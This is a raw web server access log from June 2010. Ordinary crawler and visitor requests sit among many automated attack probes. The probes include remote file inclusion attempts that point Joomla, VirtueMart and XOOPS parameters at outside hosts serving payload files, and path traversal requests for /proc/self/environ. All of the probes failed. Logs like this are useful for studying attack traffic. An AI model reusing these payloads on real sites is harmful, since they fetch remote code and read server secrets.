62.43.194.164 - - [28/Jun/2010:05:37:31 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.dyesscreek.com/famtree/documents/ID-RFI.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
62.43.194.164 - - [28/Jun/2010:05:37:31 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.dyesscreek.com/famtree/documents/ID-RFI.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
207.7.108.242 - - [28/Jun/2010:05:37:38 -0500] "GET /logs/access_log.1276473600/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
207.7.108.242 - - [28/Jun/2010:05:37:38 -0500] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.7.108.242 - - [28/Jun/2010:05:37:38 -0500] "GET /logs/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
200.202.243.41 - - [28/Jun/2010:05:38:04 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
80.177.1.221 - - [28/Jun/2010:05:41:02 -0500] "GET /logs/access_log.1275696000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 308 "-""libwww-perl/5.805"
80.177.1.221 - - [28/Jun/2010:05:41:03 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 281 "-""libwww-perl/5.805"
80.177.1.221 - - [28/Jun/2010:05:41:03 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 286 "-""libwww-perl/5.805"
69.162.118.240 - - [28/Jun/2010:05:41:45 -0500] "GET /logs/access_log.1275696000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
69.162.118.240 - - [28/Jun/2010:05:41:45 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
69.162.118.240 - - [28/Jun/2010:05:41:45 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
89.108.64.192 - - [28/Jun/2010:05:43:29 -0500] "GET /logs/access_log.1276732800///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.812"
89.108.64.192 - - [28/Jun/2010:05:43:29 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.812"
89.108.64.192 - - [28/Jun/2010:05:43:30 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.812"
218.145.71.241 - - [28/Jun/2010:05:48:16 -0500] "GET /logs/access_log.1276128000/firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.805"
218.145.71.241 - - [28/Jun/2010:05:48:16 -0500] "GET /logs/access_log.1276128000/firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.805"
218.145.71.241 - - [28/Jun/2010:05:48:17 -0500] "GET /firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
218.145.71.241 - - [28/Jun/2010:05:48:17 -0500] "GET /firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
218.145.71.241 - - [28/Jun/2010:05:48:17 -0500] "GET /logs/firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.805"
218.145.71.241 - - [28/Jun/2010:05:48:17 -0500] "GET /logs/firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.805"
218.145.71.241 - - [28/Jun/2010:05:48:26 -0500] "GET /logs/access_log.1275782400/firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.805"
218.145.71.241 - - [28/Jun/2010:05:48:27 -0500] "GET /logs/access_log.1275782400/firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.805"
67.195.112.180 - - [28/Jun/2010:05:51:22 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [28/Jun/2010:05:51:23 -0500] "GET /logs/access_log.1219881600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
194.126.172.239 - - [28/Jun/2010:05:57:01 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
194.126.172.239 - - [28/Jun/2010:05:57:01 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
194.126.172.239 - - [28/Jun/2010:05:57:01 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
194.126.172.239 - - [28/Jun/2010:05:57:01 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
194.126.172.239 - - [28/Jun/2010:05:57:01 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
194.126.172.239 - - [28/Jun/2010:05:57:01 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
194.126.172.239 - - [28/Jun/2010:05:57:02 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
194.126.172.239 - - [28/Jun/2010:05:57:02 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
194.126.172.239 - - [28/Jun/2010:05:57:02 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
194.126.172.239 - - [28/Jun/2010:05:57:02 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
194.126.172.239 - - [28/Jun/2010:05:57:02 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
194.126.172.239 - - [28/Jun/2010:05:57:02 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.195.112.180 - - [28/Jun/2010:06:00:10 -0500] "GET /logs/access_log.1203897600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [28/Jun/2010:06:02:18 -0500] "GET /logs/access_log.1265068800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.11.230.201 - - [28/Jun/2010:06:03:09 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
66.11.230.201 - - [28/Jun/2010:06:03:15 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
66.11.230.201 - - [28/Jun/2010:06:03:15 -0500] "GET /logs/access_log.1266710400%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 364 "-""Mozilla/5.0"
67.205.67.73 - - [28/Jun/2010:06:03:20 -0500] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 293 "-""Mozilla/3.0 (OS/2; U)"
67.205.67.73 - - [28/Jun/2010:06:03:20 -0500] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 298 "-""Mozilla/3.0 (OS/2; U)"
200.202.243.41 - - [28/Jun/2010:06:03:31 -0500] "GET /logs/access_log.1275696000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.813"
200.202.243.41 - - [28/Jun/2010:06:03:32 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
200.202.243.41 - - [28/Jun/2010:06:03:32 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
66.11.230.201 - - [28/Jun/2010:06:05:54 -0500] "GET /logs/access_log.1266710400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
121.78.118.123 - - [28/Jun/2010:06:07:42 -0500] "GET /logs/access_log.1274054400/index.php?option=com_svmap&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
121.78.118.123 - - [28/Jun/2010:06:07:42 -0500] "GET /index.php?option=com_svmap&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [28/Jun/2010:06:07:43 -0500] "GET /logs/index.php?option=com_svmap&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
207.46.194.56 - - [28/Jun/2010:06:08:07 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.56 - - [28/Jun/2010:06:08:07 -0500] "GET /artwork/totems2.png HTTP/1.1" 200 65973 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
67.246.62.189 - - [28/Jun/2010:06:10:01 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (compatible; Google Desktop/5.9.911.3589; http://desktop.google.com/)"
163.24.136.10 - - [28/Jun/2010:06:10:24 -0500] "GET /logs/access_log.1266710400%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 364 "-""Mozilla/5.0"
163.24.136.10 - - [28/Jun/2010:06:10:24 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
163.24.136.10 - - [28/Jun/2010:06:10:24 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
64.27.19.114 - - [28/Jun/2010:06:11:32 -0500] "GET /index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
64.27.19.114 - - [28/Jun/2010:06:11:32 -0500] "GET /index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
202.45.154.38 - - [28/Jun/2010:06:11:42 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.27.19.114 - - [28/Jun/2010:06:13:43 -0500] "GET /logs/access_log.1275609600/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
64.27.19.114 - - [28/Jun/2010:06:13:43 -0500] "GET /logs/access_log.1275609600/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
64.27.19.114 - - [28/Jun/2010:06:13:43 -0500] "GET /index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
64.27.19.114 - - [28/Jun/2010:06:13:43 -0500] "GET /index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
64.27.19.114 - - [28/Jun/2010:06:13:43 -0500] "GET /logs/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
64.27.19.114 - - [28/Jun/2010:06:13:44 -0500] "GET /logs/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
89.110.144.105 - - [28/Jun/2010:06:14:31 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.110.144.105 - - [28/Jun/2010:06:14:31 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.27.19.114 - - [28/Jun/2010:06:14:36 -0500] "GET /logs/access_log.1277251200/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
64.27.19.114 - - [28/Jun/2010:06:14:37 -0500] "GET /logs/access_log.1277251200/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
208.115.111.248 - - [28/Jun/2010:06:16:18 -0500] "GET /?N=D HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Jun/2010:06:16:20 -0500] "GET /logs/access_log.1214870400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Jun/2010:06:16:22 -0500] "GET /logs/access_log.1215129600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Jun/2010:06:16:24 -0500] "GET /logs/access_log.1215216000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Jun/2010:06:16:26 -0500] "GET /logs/access_log.1215302400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Jun/2010:06:16:28 -0500] "GET /logs/access_log.1215388800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Jun/2010:06:16:30 -0500] "GET /logs/access_log.1215475200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Jun/2010:06:16:32 -0500] "GET /logs/access_log.1215561600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Jun/2010:06:16:34 -0500] "GET /logs/access_log.1215648000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Jun/2010:06:16:36 -0500] "GET /logs/access_log.1215734400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Jun/2010:06:16:38 -0500] "GET /logs/access_log.1215907200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
78.41.233.128 - - [28/Jun/2010:06:17:11 -0500] "GET /logs/access_log.1274400000//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:06:17:11 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:06:17:12 -0500] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
202.45.154.38 - - [28/Jun/2010:06:18:14 -0500] "GET /logs/access_log.1276473600//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
202.45.154.38 - - [28/Jun/2010:06:18:14 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
202.45.154.38 - - [28/Jun/2010:06:18:15 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
87.118.96.160 - - [28/Jun/2010:06:21:25 -0500] "GET /option=com_myblog&Itemid=12&task=http://linuxnewsnow.com/xmlrpc/cache/myid.jpg? HTTP/1.1" 404 370 "-""libwww-perl/5.803"
207.7.108.242 - - [28/Jun/2010:06:22:23 -0500] "GET /option=com_myblog&Itemid=12&task=http://linuxnewsnow.com/xmlrpc/cache/myid.jpg? HTTP/1.1" 404 370 "-""libwww-perl/5.803"
207.7.108.242 - - [28/Jun/2010:06:22:23 -0500] "GET /option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 387 "-""libwww-perl/5.803"
222.124.198.172 - - [28/Jun/2010:06:23:50 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://id.wikipedia.org/wiki/Kostum""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB0.0; .NET CLR 2.0.50727; InfoPath.2)"
222.124.198.172 - - [28/Jun/2010:06:23:52 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB0.0; .NET CLR 2.0.50727; InfoPath.2)"
222.124.198.172 - - [28/Jun/2010:06:25:24 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB0.0; .NET CLR 2.0.50727; InfoPath.2)"
222.124.198.172 - - [28/Jun/2010:06:25:29 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB0.0; .NET CLR 2.0.50727; InfoPath.2)"
222.124.198.172 - - [28/Jun/2010:06:25:51 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB0.0; .NET CLR 2.0.50727; InfoPath.2)"
222.124.198.172 - - [28/Jun/2010:06:25:58 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB0.0; .NET CLR 2.0.50727; InfoPath.2)"
222.124.198.172 - - [28/Jun/2010:06:26:06 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB0.0; .NET CLR 2.0.50727; InfoPath.2)"
87.118.96.160 - - [28/Jun/2010:06:28:01 -0500] "GET /logs/access_log.1274572800/option=com_myblog&Itemid=12&task=http://linuxnewsnow.com/xmlrpc/cache/myid.jpg? HTTP/1.1" 404 397 "-""libwww-perl/5.803"
87.118.96.160 - - [28/Jun/2010:06:28:01 -0500] "GET /option=com_myblog&Itemid=12&task=http://linuxnewsnow.com/xmlrpc/cache/myid.jpg? HTTP/1.1" 404 370 "-""libwww-perl/5.803"
87.118.96.160 - - [28/Jun/2010:06:28:01 -0500] "GET /logs/option=com_myblog&Itemid=12&task=http://linuxnewsnow.com/xmlrpc/cache/myid.jpg? HTTP/1.1" 404 375 "-""libwww-perl/5.803"
87.118.96.160 - - [28/Jun/2010:06:28:23 -0500] "GET /logs/access_log.1274572800/option=com_myblog&Itemid=12&task=http://linuxnewsnow.com/xmlrpc/cache/myid.jpg? HTTP/1.1" 404 397 "-""libwww-perl/5.803"
87.118.96.160 - - [28/Jun/2010:06:28:23 -0500] "GET /option=com_myblog&Itemid=12&task=http://linuxnewsnow.com/xmlrpc/cache/myid.jpg? HTTP/1.1" 404 370 "-""libwww-perl/5.803"
87.118.96.160 - - [28/Jun/2010:06:28:24 -0500] "GET /logs/option=com_myblog&Itemid=12&task=http://linuxnewsnow.com/xmlrpc/cache/myid.jpg? HTTP/1.1" 404 375 "-""libwww-perl/5.803"
207.7.108.242 - - [28/Jun/2010:06:29:07 -0500] "GET /logs/access_log.1274572800/option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 414 "-""libwww-perl/5.803"
207.7.108.242 - - [28/Jun/2010:06:29:07 -0500] "GET /option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 387 "-""libwww-perl/5.803"
207.7.108.242 - - [28/Jun/2010:06:29:07 -0500] "GET /logs/option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 392 "-""libwww-perl/5.803"
87.250.252.241 - - [28/Jun/2010:06:30:47 -0500] "GET /tattoo HTTP/1.1" 301 330 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.252.241 - - [28/Jun/2010:06:30:48 -0500] "GET /tattoo/ HTTP/1.1" 200 466 "-""Yandex/1.01.001 (compatible; Win16; I)"
218.145.71.241 - - [28/Jun/2010:06:30:59 -0500] "GET /http://alexvanzetti.com//administrator/components/com_virtuemart/export.php=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 422 "-""libwww-perl/5.805"
218.145.71.241 - - [28/Jun/2010:06:30:59 -0500] "GET /http://alexvanzetti.com//administrator/components/com_virtuemart/export.php=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 422 "-""libwww-perl/5.805"
222.124.198.172 - - [28/Jun/2010:06:31:26 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB0.0; .NET CLR 2.0.50727; InfoPath.2)"
87.118.96.160 - - [28/Jun/2010:06:31:36 -0500] "GET /logs/access_log.1277164800/option=com_myblog&Itemid=12&task=http://linuxnewsnow.com/xmlrpc/cache/myid.jpg? HTTP/1.1" 404 397 "-""libwww-perl/5.803"
207.7.108.242 - - [28/Jun/2010:06:31:56 -0500] "GET /logs/access_log.1277164800/option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 414 "-""libwww-perl/5.803"
